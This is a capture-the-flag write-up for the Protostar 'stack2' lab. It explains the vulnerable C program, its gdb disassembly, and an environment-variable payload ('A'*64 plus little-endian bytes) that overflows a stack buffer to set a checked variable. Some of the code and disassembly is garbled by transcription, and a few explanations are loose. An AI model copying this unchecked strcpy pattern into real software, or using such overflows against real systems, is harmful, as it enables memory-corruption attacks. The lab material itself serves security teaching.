PROTOSTAR: STACK 2



SOURCE CODE

```
int main(int argc, char **argv)
 volatile int modified;
 char buffer[64];
 char *variable;
 variable = getenv("GREENIE");
  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
 modified = 0;
  strcpy(buffer, variable);
  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
```

SOURCE CODE EXPLANATION

- •Variables : volatile int modified , char buffer[64] , char *variable.
- •The program checks for an environment variable (GREENIE) using the getenv() cmd in C.
- •Variable = stores the value received from the GREENIE environment variable.
- •If the variable = NULL (empty) \rightarrow then the program prints the statement please set the GREENIE environment variable\n".
- •strcpy(buffer, variable) → copies the value of variable to buffer.
- •Modified variable is set to 0. It checks whether the value of modified is equal to 0x0d0a0d0a. (NOTE: Hex address should be stored as per LITTLE ENDIAN SYSTEM).
- •We need to set the **GREENIE**(environment variable) value in such a way that it causes **STACK BUFFER OVERFLOW.**
- •The overflow value will affect the **modified variable** and we will push the **0x0d0a0d0a** hex address while **overflowing modified variable**. After successfully **reversing** the code we will get this message "you have correctly modified the variable\n".

ENVIRONMENT VARIABLES

DEFINITION:

A variable whose value is set outside the program. **Environment variable** consists of various important values responsible for the proper functioning of the program. These **environment variables** can consist codes which are also responsible for the working of **Operating System.** Shows the current user information and the login timings and other user values and system information.

For example \rightarrow **PATH** environment variable consists the path of the directory or contains the location of a program or executable. When we search and start the program the **Operating System** searches the **PATH** environment variable for the program location.

%ProgramFiles% environment variable consist of the Programs stored in **OS**, typically in the **"C:\Program Files"** location.

If you are in in **Windows** you can lookup for **Environment Variables** in the **start menu**. If you are in **Linux** type the cmd \rightarrow **env** this will show you the various environment variables in the current user session.

USING GDB TO REVERSE ENGINEER AND ANALYZE ASSEMBLER INSTRUCTIONS

```
user@protostar:/opt/protostar/bin$ ./stack2
stack2: please set the GREENIE environment variable
user@protostar:/opt/protostar/bin$ gdb -q stack2
Reading symbols from /opt/protostar/bin/stack2...done.
(gdb) set disassembly-flavor intel
(gdb) disass main
Dump of assembler code for function main:
0x08048494 <main+0>:
                                ebp
                         push
0 \times 08048495 < main+1>:
                                 ebp, esp
0x08048497 <main+3>:
                         and
                                esp,0xfffffff0
0x0804849a <main+6>:
                         sub
                                esp.0x60
0x0804849d <main+9>:
                                DWORD PTR [esp],0x80485e0
                         mov
0x080484a4 <main+16>:
                         call
                                0x804837c <getenv@plt>
0x080484a9 <main+21>:
                                DWORD PTR [esp+0x5c],eax
                         mov
0x080484ad <main+25>:
                         cmp
                                DWORD PTR [esp+0x5c],0x0
0x080484b2 < main+30>:
                                 0x80484c8 <main+52>
0x080484b4 <main+32>:
                         mov
                                 DWORD PTR [esp+0x4].0x80485e8
0x080484bc <main+40>:
                         mov
                                DWORD PTR [esp].0x1
                                0x80483bc <errx@plt>
0x080484c3 < main + 47 > :
                         call
0x080484c8 <main+52>:
                         mov
                                DWORD PTR [esp+0x58].0x0
                                eax, DWORD PTR [esp+0x5c]
0x080484d0 < main+60>:
                                DWORD PTR [esp+0x4],eax
0 \times 080484d4 < main + 64 > :
                         mov
0x080484d8 <main+68>:
                         lea
                                 eax, [esp+0x18]
0x080484dc < main + 72 > :
                         mov
                                DWORD PTR [esp],eax
0 \times 080484 df < main + 75 > :
                         call
                                0x804839c <strcpy@plt>
0x080484e4 < main + 80 > :
                                 eax, DWORD PTR [esp+0x58]
0x080484e8 <main+84>:
                                 eax.0xd0a0d0a
                         cmp
0x080484ed <main+89>:
                                 0x80484fd <main+105>
                         ine
0x080484ef <main+91>:
                                DWORD PTR [esp], 0x8048618
                         mov
0x080484f6 <main+98>:
                         call
                                0x80483cc <puts@plt>
0x080484fb <main+103>:
                         jmp
                                 0x8048512 <main+126>
0x080484fd <main+105>:
                         mov
                                 edx.DWORD PTR [esp+0x58]
0x08048501 <main+109>:
                         mov
                                 eax,0x8048641
0x08048506 <main+114>:
                         mov
                                DWORD PTR [esp+0x4].edx
0x0804850a <main+118>:
                         mov
                                DWORD PTR [esp],eax
0x0804850d <main+121>:
                         call
                                0x80483ac <printf@plt>
0x08048512 <main+126>:
0x08048513 <main+127>:
End of assembler dump.
(qdb)
```



./stack2 executes the program but as I explained during the source code explanation part, without adding the env variable the code won't work. It will always ask the user to set env variable.

```
      0x080484e4 <main+80>:
      mov
      eax,DWORD PTR [esp+0x58]

      0x080484e8 <main+84>:
      cmp
      eax,0xd0a0d0a

      0x080484ed <main+89>:
      jne
      0x80484fd <main+105>

      0x080484ef <main+91>:
      mov
      DWORD PTR [esp].0x8048618
```

Checkout the highlighted instructions clearly. It first **moves** or copies the value of **esp+0x58** register to **eax**. Then it compares the value of **eax** with **0xd0a0d0a**. If the comparison **returns zero** then

0x080484ed <main+89>: jne 0x80484fd <main+105>

This clearly tells us that esp+0x58 → modified variable of the C program.



esp+0x5c → variable . It checks for the GREENIE environment variable.

STACK BUFFER OVERFLOW ATTACK AND ADDING ENVIRONMENT VARIABLE

```
user@protostar:/opt/protostar/bin$ export GREENIE=$(python -c "print 'A'*64")
user@protostar:/opt/protostar/bin$ ./stack2
Try again, you got 0x00000000
user@protostar:/opt/protostar/bin$ export GREENIE=$(python -c "print 'A'*64 + '\x0a\x0d\x0a\x0d\")
user@protostar:/opt/protostar/bin$ ./stack2
you have correctly modified the variable
user@protostar:/opt/protostar/bin$ ...
```

export GREENIE=\$(python -c "print 'A'*64") Try again, you got 0x0000000

At first I intentionally exported the **GREENIE env** without causing **Buffer Overflow** to checkout the output and as discussed in the previous slides the **eax** comparison isn't **equal to zero** so the program asks us to **try again**.

export GREENIE= $\$(python -c "print 'A'*64 + '\x0a\x0d\x0a\x0d'")$ you have correctly modified the variable

This time I filled the **buffer variable** with **64 string characters of A** then I appended the string with the hex value of the address specified in the if condition → if(modified == 0x0d0a0d0a)

NOTE: The address needs to be appended by keeping the **LITTLE ENDIAN SYSTEM** in MIND.